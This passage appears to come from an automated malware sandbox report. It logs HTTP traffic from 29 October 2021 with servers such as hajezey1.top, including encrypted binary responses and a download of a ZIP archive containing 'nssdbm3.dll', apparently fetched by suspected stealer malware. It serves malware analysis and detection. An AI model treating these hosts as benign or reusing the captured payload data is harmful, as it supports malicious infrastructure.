72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:50:19 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 66 36 36 0d 0a 00 00 d2 a7 53 28 ca 53 57 5c 2f 8f 69 c1 50 22 ec 26 d8 a1 e7 26 67 0b 72 90 86 ec d2 ca 71 c4 7c be 02 d7 36 3f f4 65 91 89 49 80 4a 35 7e dc 99 bc 2f 8d 61 e9 72 e6 ce 17 b5 12 df 9c 22 60 1b d6 88 67 a1 c2 8a 31 51 0f 88 35 69 d1 88 86 a9 68 1b 1c 2e 4b 08 84 f3 77 b3 f6 12 94 b5 d4 02 cc 3a d8 c8 69 2f 2b ba 22 2e c0 90 88 e0 5d 98 70 16 d6 08 e3 57 da d8 ed 21 e5 e1 94 52 ea 59 9b 93 e2 86 38 f8 f3 a4 7c a5 c7 46 aa 8f 8c f5 cf 9b 2b 25 9b f6 ba e9 1a b0 1c 67 74 d2 a9 85 87 cd 31 81 78 51 a1 a2 8f 00 8e c2 1c e0 32 02 50 08 88 c5 e2 30 a5 59 93 9b b7 4f f3 e0 e6 62 79 04 54 ea d6 d7 0c 3d 61 1d 27 f4 d2 af 34 91 b4 b9 01 9c 20 59 55 11 5c 7c 3b 66 ab 49 11 80 c8 58 4b 67 13 d2 18 5b 47 86 65 39 15 32 29 c5 f7 15 67 aa cf 20 c0 7a 9f 06 a2 7f c1 96 98 8b 36 99 79 d6 8a 5c d8 06 0e 45 07 0e 7d cf f3 e1 04 89 f9 d4 57 80 90 70 89 ec e4 4a 6b b6 f2 a2 22 48 92 cc 49 a1 ff bc ff 1f fd f5 3f f4 6f d3 7c cb 36 d2 ce 4e 49 b3 0b 5b 4c 65 55 5b ad 30 7a 83 3b 2b ca c3 e3 b2 ec 92 90 0f 1c 57 ee 87 7e 0c 35 8a 3d 50 7f d0 56 81 b6 9b 97 96 70 9f 8a 86 e8 47 5a ad b2 cb 99 6c 71 11 87 02 b1 b8 56 b0 40 f6 0a bf 8b 71 91 ce 21 b5 1e 55 df 76 79 ff 64 45 96 da 19 d1 3a 2d e4 5e 06 02 25 47 c2 fa 6b 8a b2 e2 4b 6d ec c0 40 a4 e2 d0 d7 d9 86 4e 85 8b 51 b0 3e 5b f3 d1 8f 4b 04 38 ad 62 14 2c c6 e9 b1 14 37 6c 10 22 17 4a 86 47 30 5a 22 a2 3f 0b 8e 6b 51 fd b5 54 02 f9 ee f8 b2 d6 4a 1f a7 e9 4d 51 62 5f 64 cd 25 5c 8d b7 f7 3d 0c 26 17 51 d2 eb e9 23 19 9d 46 3c 70 76 41 ae a6 c3 88 3e 9d 43 dd 17 fe 2f 43 9e f8 d8 62 47 42 91 81 a8 be 34 56 9b 46 76 99 86 11 00 83 32 42 ca 43 ce ae 80 3a 95 36 e1 48 50 67 b6 50 b8 81 0e 76 81 de 33 fb 76 36 cf 09 27 4e e2 d2 be 95 47 ab 63 10 ec f8 b9 5f 14 2c f2 e6 2f bd 44 ef bf 8b 4f dc ea 90 39 02 97 ab a4 
57 25 f5 b8 d0 f1 b5 60 4a 3a 7d 54 7a 99 6c 39 d1 5e f3 5f 76 4e 63 95 b4 0d 16 cb 9c 51 24 22 7d ec b9 68 62 be 7f 13 eb cd f6 25 15 88 d8 95 7f 8e 4a 9b 16 66 45 a7 0d 7c 8e 24 38 69 81 7d af 01 ec 83 41 66 20 ae b8 ea 21 19 a0 4a 48 61 8c bd 77 6a 67 17 0d f1 ee 22 3b 6f ab e5 84 79 f3 53 d3 e4 9a 24 59 d4 55 23 2c 0f 70 d7 b1 56 09 d6 89 bc 08 81 dd ad 80 41 ca 2a 85 d8 de 3e 67 a0 f5 ba 08 c0 fa 5d e4 1f 28 68 bc fa a5 ed 82 ac 11 40 31 02 1a 1f c1 e0 f7 6f f0 e7 17 d3 87 45 d0 ef 44 e9 cf 81 6c 59 20 9b e9 db f0 c3 05 d4 99 cd 21 42 47 c4 a5 cc 49 55 c8 08 f2 bb d9 39 6f 8b 87 9a 0c ef 0f 4e 88 f0 24 bf 34 fa 8b b4 26 bc 06 46 b0 0c 64 08 d8 fd f8 c9 4a 26 1b 3c 2d 6f 73 74 87 35 60 a0 99 ff 6d 37 d3 ad a1 84 0b 84 f3 9e 98 bb 1f 65 c7 26 f0 3b ee a2 8e f0 03 af 63 96 1d f7 a9 15 15 1c 70 40 cd c9 e1 dd b0 c0 0f 25 99 59 c6 1e aa c6 8e 34 3d f6 46 64 68 de be 9c 98 3f d8 2f eb 53 52 a0 0e 94 97 04 76 f9 1e f3 20 64 84 b9 64 4f 55 a7 fa 5b c3 96 c0 88 0b 39 d9 1d 78 09 dd 90 1a c1 03 7a 06 16 f4 d4 6c d1 79 04 da
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:50:23 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:50:23 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:50:43 GMTContent-Type: text/html; charset=utf-8Content-Length: 7Connection: keep-aliveX-Powered-By: PHP/5.6.40Data Raw: 03 00 00 00 1d 3d 5e Data Ascii: =^
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:50:43 GMTContent-Type: text/html; charset=utf-8Content-Length: 42Connection: keep-aliveX-Powered-By: PHP/5.6.40Data Raw: 00 00 b5 55 08 b5 79 73 2f 7e 28 10 e8 c3 a7 f7 be 60 3a 07 9b 01 c2 40 9c e2 0f b3 66 f5 26 0a 5b 22 f9 6a 00 7e c2 5d 31 0e Data Ascii: Uys/~(`:@f&["j~]1
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:50:50 GMTContent-Type: text/html; charset=utf-8Content-Length: 327Connection: keep-aliveX-Powered-By: PHP/5.6.40Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:50:50 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveX-Powered-By: PHP/5.6.40Data Raw: 31 66 34 32 0d 0a 00 00 b4 60 fb d4 0e 1a 40 10 16 30 80 b7 2c 78 84 4f ad 7d f5 71 b1 34 b2 96 20 c3 49 91 4a 25 39 57 90 06 64 04 ec 38 49 6b 19 b1 cd e4 dc b5 44 a4 06 4a 38 50 87 d2 d9 c3 3e 08 a2 13 fd 8e e2 e3 07 97 8a 06 9e 8f f1 83 0e 25 a6 79 5e 5c 95 03 0f 2e 0e 4b 69 e1 d9 a0 6a 7d ec 53 2e 3b 76 4b 12 73 36 18 28 a6 70 a3 d1 5f 36 6b 85 29 7c f2 c6 e6 70 95 06 7c 93 74 5d b9 53 68 47 8f 2a f5 b1 ba 89 c7 a8 25 9f ae 04 75 64 62 d8 e6 b8 a1 54 5e 1b 80 2b d8 55 a8 c7 ea 87 23 6d 16 be 61 f6 31 6d 17 41 3e da 16 a3 c9 32 6e a0 14 dc ac 2f 7b b0 2d 61 47 b0 7a 0d de 75 8f f9 9f 56 11 36 05 4a f4 e2 d7 c0 07 43 c8 48 09 d2 74 94 82 bf 6c 13 d9 39 03 d5 18 33 4f 62 3e 15 21 0b 5a f3 43 93 3a 1a 3e cf 00 8e ff 0e 43 d7 07 53 53 fa cb 1f 9e fd 09 51 2a ee 8c 8a 7b 7e 85 f6 ff 78 f3 56 db c4 0d 13 13 e3 0f e0 92 24 18 4f c5 03 71 ca a1 61 7e 9e f5 69 a9 19 17 7e 5d af 9a a0 44 c9 a0 c1 b9 dd 7a 08 90 4e 19 e0 2c 95 a9 18 7a f0 96 be 21 51 61 9a d4 3e 7c 8a 28 c8 c9 6b a1 d0 4a 9a 13 fd ec 9e aa 6b ac 87 3f bd 61 0d c0 5d bf 56 34 fd f8 a2 7a 31 6c 1a 7c 0a 8d 1b f9 e6 0e 10 eb 7e 71 eb 90 f0 1a 10 de 4a d8 19 ae cc 4f 3b 79 82 ae 9c 97 02 4c 75 56 ad f3 57 3b 2a b9 72 ee cc 23 22 a6 0f 31 65 92 90 f7 df f5 ec e7 72 2b 4c 80 d0 12 f9 13 63 11 bb d6 af 31 3c 27 d4 69 b7 9f 73 33 cd 46 99 48 15 ac af eb d9 55 3d af ba 68 92 de fe 9d 57 7c 55 40 57 64 7b 39 66 e7 ac 04 28 84 42 40 77 9b c7 9b 84 e7 3d 66 f1 8a 64 b1 33 44 77 29 f8 70 17 4b a8 d4 de 8e 82 11 e8 e4 1f 9e a0 90 4e a5 54 55 a5 8e b7 1b 6f c3 cb 29 32 28 e7 5b 3e 54 ab 7e 08 0f 75 8f b7 af 57 a3 af 5b 85 1f d4 8c 69 91 9c 61 06 f1 2c 9a af 03 5b e5 1f e4 a6 7d 10 9f 10 b9 d9 b0 d9 07 99 ca e3 80 1e 00 18 50 6d 43 e4 56 89 8b e1 42 78 d7 9c 9e c3 e0 2b a5 b6 bb 01 
7a 17 28 d2 ae 46 1f d0 a1 aa 7a cf f6 6b 23 e3 a2 aa 45 63 80 e3 1c b1 65 f5 52 48 d4 3f 96 4d 8d e7 17 3f fe e7 7e 4d a6 70 d4 03 eb ac 98 76 6e 0f ca c2 cf 25 6e 9f 96 ce ec 35 98 c3 a7 0d a8 ca d4 5f 29 43 43 9c 55 03 62 18 3a 1d f8 40 aa ae 88 c1 c4 a1 33 25 7d da a9 c3 e8 c8 2f cb e2 09 e8 8b 23 1e ac 18 b8 77 b3 0e 93 81 19 13 88 b9 8c f5 18 97 52 b9 c1 ea 9e 13 e8 b8 4c 45 e1 f0 73 8d 43 d9 ed 07 b2 52 dc 1a 9e 8b 18 57 21 01 7d 42 03 81 96 7f d8 2e 27 9d df 3c 42 56 60 de 9e 73 0f b6 65 a2 25 1f 78 60 38 30 5f d6 a6 b8 78 fe b1 8e 98 6d 18 5e 32 d0 e9 f3 32 42 c2 39 16 12 47 0b e9 17 10 8d e3 51 20 b2 3d db 10 54 5a 17 1c 5c 5a 16 b3 19 5f 11 8f 69 f9 e4 39 2a 01 6e f1 fd 58 b3 dc 95 25 1c 90 53 72 5e 15 33 b5 01 82 e3 92 c2 01 6d 7e d3 85 bc 43 cf 76 62 93 45 e1 05 85 d4 9c 97 2e 60 10 3a 93 8b 94 e5 fe d6 ae 32 c8 6e d5 8d 4a ad fb 91 65 69 17 ee f3 af 84 ed 67 e1 a2 3a 84 aa 58 5d 1c 79 9b 37 67 d2 1f ad af ac d5 54 24 d1 e4 dd b2 3a 6a c0 8e ad 90 bb 9a 05 71 77 92 ae 0f 27 d1 9c 65 53 55 cd ab 48 63 36 cc
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:50:54 GMTContent-Type: text/html; charset=utf-8Content-Length: 327Connection: keep-aliveX-Powered-By: PHP/5.6.40Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:50:55 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveX-Powered-By: PHP/5.6.40Data Raw: 31 66 34 32 0d 0a 00 00 b4 60 fb d4 0e 1a 40 10 16 30 80 b7 2c 78 84 4f ad 7d f5 71 b1 34 b2 96 20 c3 49 91 4a 25 39 57 90 06 64 04 ec 38 49 6b 19 b1 cd e4 dc b5 44 a4 06 4a 38 50 87 d2 d9 c3 3e 08 a2 13 f5 8e e2 e3 07 97 8a 06 9e 8f f1 83 0e 25 a6 79 5e 5c 95 03 0f 2e 0e 4b 69 e1 d9 a0 6a 7d ec 53 2e 3b 76 4b 12 73 36 18 28 a6 70 a3 d1 5f 36 6b 85 29 7c f2 c6 e6 70 95 06 7c 93 74 5d b9 53 68 47 8f 2a f5 6e 17 9d f8 77 88 8b 91 db d8 70 5d 07 4b ac 9e ed fd 31 bf c2 75 41 97 7e 49 8e 1c 1e bb aa 5e 4f 92 40 28 0d 93 ce 29 75 1c b4 51 a8 b9 c8 93 f9 ae 21 12 97 ea a4 45 b4 7d 5c b0 26 32 42 2e 8f a6 50 cb 3d 7a d4 38 fa 6b 50 36 0d d9 80 bd bf 6c 13 d9 e6 ae c1 27 33 4f 62 3e 15 21 0b 5a a3 06 93 3a 56 3f cb 00 73 fb 42 15 9b 06 56 53 af 17 bf c1 1d 09 52 2b e5 8d 83 7b 9e 45 f5 fe 73 8c 5f db c4 87 19 13 bf de 91 90 24 08 4f c5 63 28 c3 a1 61 6e de f5 69 19 13 17 7e 5f ef 9a a5 54 c9 a0 c1 bb dd 7a 08 90 4f 19 e0 2c 95 a9 1d 1a f4 96 be 25 51 61 9a 44 45 7e 88 2c c8 48 78 83 cc 4a 98 03 fd 6d 9e aa 6b ac 87 3f bd 61 0d c0 4d bf 46 24 fd f8 12 6c 33 6c 39 7c 0a 8d c7 fd e4 0e a4 eb 7e 71 cf 0e ff 1a 0c 9b 4a d8 19 8e b6 4d 3b 45 82 ae 9c 97 02 4c 75 56 ad f3 57 3b 2a b9 72 ee cc 23 b2 15 74 33 f5 89 90 f7 ef e7 ec e7 6e 2b 4c 80 d0 12 f9 13 63 11 bb d6 af 31 3c 27 d4 69 b7 9f 33 c9 cc 46 d9 48 15 ac 4f 96 d1 55 7d af ba 68 92 0e ff 9d 7f 7f 55 40 57 74 7b 39 ba e6 ac 04 28 84 42 40 77 9b c7 9b 84 e7 3d 66 f1 8a 64 b1 1d 30 12 51 8c 70 17 4b af 1f ba f6 f6 01 e8 e4 47 d7 ab 90 4e b1 54 55 a5 04 bd 1b 6f c7 cb 29 32 28 e7 5b 1e 54 ab 1e 26 7d 11 ee e3 ce 57 c3 62 79 e4 6b b5 5c 68 91 54 40 69 f3 2c fe a4 03 5b f3 1f e4 a6 f3 1a 9f 10 b9 d9 b0 99 07 99 8a cd e4 7f 74 39 50 6d 83 e2 cf e2 e5 84 0e 15 b0 79 8a c3 e0 2b b9 ce b9 01 
7e 17 28 d2 0a 4c 1f d0 a1 aa 7a 8f f6 6b e3 cd d0 d9 37 40 80 e3 dc e7 52 86 20 2b c4 3a 96 4d f7 e7 17 3f fc 9f 7c 4d 9a 70 d4 03 43 a6 98 76 6e 0f ca 82 cf 25 2e 9f 96 ce ec 75 98 c3 e7 23 da af b8 30 4a 43 43 6c 76 02 62 18 5a 67 fa 40 8e af 88 c1 20 ab 33 25 7d da a9 c3 e8 c8 2f cb e2 09 e8 cb 23 1e ee 18 b8 77 b3 0e 93 81 19 13 88 b9 8c f5 18 97 52 b9 c1 ea 9e 13 e8 b8 4c 45 e1 f0 73 8d 43 d9 ed 07 b2 52 dc 1a 9e 8b 18 57 21 01 7d 42 03 81 96 7f d8 2e 27 9d df 3c 42 56 60 de 9e 73 0f b6 65 a2 25 1f 78 60 38 30 5f d6 a6 b8 78 fe b1 8e 98 6d 18 5e 32 d0 e9 f3 32 42 c2 39 16 12 47 0b e9 17 10 8d e3 51 20 b2 3d db 10 54 5a 17 1c 5c 5a 16 b3 19 5f 11 8f 69 f9 e4 39 2a 01 6e f1 fd 58 b3 dc 95 25 1c 90 53 72 5e 15 33 b5 01 82 e3 92 c2 01 6d 7e d3 85 bc 43 cf 76 62 93 45 e1 05 85 d4 9c 97 2e 60 10 3a 93 8b 94 e5 fe d6 ae 32 c8 6e d5 8d 4a ad fb 91 65 69 17 ee f3 af 84 ed 67 e1 a2 3a 84 aa 58 5d 1c 79 9b 37 67 d2 1f ad af ac d5 54 24 d1 e4 dd b2 3a 6a c0 8e ad 90 bb 9a 05 71 77 92 ae 0f 27 d1 9c 65 53 55 cd ab 48 63 36 cc
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Fri, 29 Oct 2021 18:51:02 GMTContent-Type: application/octet-streamContent-Length: 2828315Connection: keep-aliveLast-Modified: Wed, 01 Sep 2021 16:21:39 GMTETag: "612fa893-2b281b"Accept-Ranges: bytesData Raw: 50 4b 03 04 14 00 00 00 08 00 9a 7a 6e 4e 3c 09 f8 7b 72 d2 00 00 d0 69 01 00 0b 00 00 00 6e 73 73 64 62 6d 33 2e 64 6c 6c ec fd 7f 7c 14 d5 d5 38 00 cf ee 4e 92 0d 59 d8 05 36 18 24 4a 90 a0 d1 a0 06 16 24 31 80 d9 84 dd 44 20 b0 61 c9 2e 11 13 b4 6a 4c b7 56 f9 b1 43 b0 12 08 4e 02 3b 19 b7 f5 e9 a3 7d ec 2f ab f5 f1 e9 0f db a7 b6 b5 80 d5 ea 86 d8 24 f8 13 81 5a 2c 54 a3 52 bd 71 63 8d 92 86 45 63 e6 3d e7 dc 99 dd 0d da ef f7 fb be 7f bf f0 c9 ec cc dc 3b f7 9e 7b ee b9 e7 9e 73 ee b9 e7 d6 de 70 bf 60 11 04 41 84 3f 4d 13 84 83 02 ff 57 21 fc df ff e5 99 04 61 ca ec 3f 4e 11 9e ca 7e 65 ce 41 d3 ea 57 e6 ac 6f f9 fa b6 82 cd 5b ef ba 7d eb cd df 2c b8 e5 e6 3b ef bc 2b 5c f0 b5 db 0a b6 4a 77 16 7c fd ce 82 15 6b fd 05 df bc eb d6 db ae 9a 3c 79 52 a1 5e c6 45 07 6f 18 6e 78 73 d1 63 c6 9f ef d1 9f 3d 56 0f bf ed cf 2c fe e9 46 f8 ed bb fb cc 63 75 f4 bc e4 a7 1b e8 77 c1 4f fd f4 5b f2 d3 75 f0 7b cf d3 3c df 77 ff b8 f8 a7 37 50 19 8b 1f 7b 91 9e 4b 7e ea a6 df 45 f4 dd 77 ff f8 d2 63 fc f7 1a 7a 5e f7 f5 5b 5a b0 be 7f d7 36 9f 47 10 56 9b 32 84 e7 2b ba 6e 34 de 0d 08 97 cc c9 31 4d c9 11 2e 84 86 97 f0 77 7b 66 c3 bd 03 6e 4a 4c f8 e8 a0 7b b3 20 64 0a f4 9c fc 15 da 4d 84 e4 2b b6 98 20 b9 82 7f e4 10 84 d4 2f ff 29 b8 ce 24 58 21 b5 08 b2 f4 e3 cb 9b 4c c2 0e 4b 1a 60 ab 4d c2 91 8b e0 77 b3 49 f8 ef 4c 41 38 72 ad 49 58 ff 7f e8 a3 a2 72 d3 c4 be 04 38 37 98 ff 7d fe ab c2 b7 ed 08 c3 ef e9 3c bd 5d 17 72 b8 d3 ff 15 00 54 57 6d bd f5 e6 f0 cd 82 b0 62 36 2f 13 5f 0a 17 9b d2 b3 61 bd 15 57 f1 6c 42 02 db e0 33 11 6e 84 e5 5f ca 17 bb 6a eb b6 ad b7 08 02 6f eb 4d 7a 9d 15 5f 51 de d6 db ee b8 eb 16 81 da 8e 38 10 ac f0 bb e2 4b f9 2a 85 ff ff bf ff a7 7f f5 ea 90 bc 
ac c8 67 72 08 e1 4c b9 cd 2a 48 2e b5 d6 76 b6 fb 8b 84 36 5b 2a 92 bf e9 34 49 97 a8 dd 7b de 31 67 09 c2 3c 1c 02 3e 4d ca d3 24 47 9d 26 59 d9 8b d0 f7 f2 0b ce c6 1e 2d f7 a1 12 93 a3 4f 98 01 39 5c b1 c6 1e 2c 74 c8 e1 57 1b 6d ae 58 20 a8 b6 59 d5 33 ea 2a 87 e2 19 53 3c 23 7d 1e 22 85 3e cf 30 52 42 67 2c 9c 1d b2 6c 68 2e 73 8b e1 6f d8 0f b8 c5 e6 72 cf 70 38 13 ae 09 29 bf cf 33 82 1d 4b 0f 76 fb 01 93 eb 64 73 d9 8d 6e 33 14 2b 5d 07 8f f6 03 2b dc e3 ae c3 ed 6b 72 4d 75 01 5f 90 59 5c 82 a0 0e cb 2f 38 54 cf 18 96 0b af 06 26 0b 42 43 83 22 8d 75 8e da 3b be 0f 65 a9 6b 20 75 24 1e 81 cf 15 8f cd 7e 60 bd 7b 1c 21 ab 4d c8 09 f3 ae 5c 57 ac 59 a9 33 37 2b 6e 51 f5 5a 95 2a ab ea b1 c5 33 5c 47 15 bf 35 64 be a1 f8 90 5a 9f 68 56 4c cd ea 5a 1b 7c 6b 89 35 17 f7 ab 58 46 ac 59 1e cc 6c 56 56 57 9a d5 43 98 d8 7c bd fd 80 80 